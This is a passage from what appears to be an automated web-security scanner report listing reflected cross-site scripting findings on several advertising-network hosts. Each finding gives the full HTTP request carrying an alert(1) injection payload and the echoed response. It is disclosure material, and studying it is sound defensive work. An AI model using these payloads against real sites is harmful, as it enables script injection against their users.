GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&66d9b"><script>alert(1)</script>33d30fc9f77=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&66d9b"><script>alert(1)</script>33d30fc9f77=1http://ad.agkn.com/interaction!che=1729807310?imid=1986120337867889664&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beau
...[SNIP]...

4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d02"%3balert(1)//af3500c71af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0d02";alert(1)//af3500c71af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&d0d02"%3balert(1)//af3500c71af=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&d0d02";alert(1)//af3500c71af=1http://ad.agkn.com/interaction!che=874001907?imid=2782821342895287091&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beaut
...[SNIP]...

4.37. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f31'-alert(1)-'3e4fe9ccd73 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90d8f31'-alert(1)-'3e4fe9ccd73&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:27 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90d8f31'-alert(1)-'3e4fe9ccd73&referrer=http://www.seattlepi.com/&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90d8f31%27-alert%281%29-%273e4fe9ccd73%26s%3D93
...[SNIP]...

4.38. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3216d'-alert(1)-'e768692f2be was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=9374993216d'-alert(1)-'e768692f2be&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:44 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.seattlepi.com/&inv_code=9374993216d'-alert(1)-'e768692f2be&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D9374993216d%27-alert%281%29-%27e768692f2be%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%2
...[SNIP]...

4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee6a5<script>alert(1)</script>5c123fbe1b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 17 Sep 2011 16:35:32 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5

4.40. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504f7"><script>alert(1)</script>97b487c8f84 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=504f7"><script>alert(1)</script>97b487c8f84&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 365
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f840=uid=17420266; expires=Sun, 18-Sep-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f84=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4277&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:26 GMT
Connection: close

<a href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=http://adsfac.us/link.asp?cc=504f7"><script>alert(1)</script>97b487c8f84.0.0&CreativeID=1" target=_blank>
...[SNIP]...

4.41. http://adsfac.us/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c3d'%3balert(1)//f39440116ba was submitted in the clk parameter. This input was echoed as 33c3d';alert(1)//f39440116ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d'%3balert(1)//f39440116ba HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4241
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423833; expires=Sun, 18-Sep-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=57&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d';alert(1)//f39440116bahttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594';var fd_wdt=728;var fd_hgt=90;document.writeln("<!-- Aug 11 2011 4:37:48:773PM(v10) -->
...[SNIP]...

4.42. http://adsfac.us/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6104"><script>alert(1)</script>3966686c35b was submitted in the clk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35b HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4271
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423629; expires=Sun, 18-Sep-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=55&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
<a target="_blank" href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35bhttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594">
...[SNIP]...

4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a11bc"-alert(1)-"b393fe7193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a11bc"-alert(1)-"b393fe7193b/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a11bc"-alert(1)-"b393fe7193b/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79aaf"><script>alert(1)</script>0cb01a4ae72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/" />
...[SNIP]...

4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff5d"><script>alert(1)</script>de78e1ca44a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:01 GMT
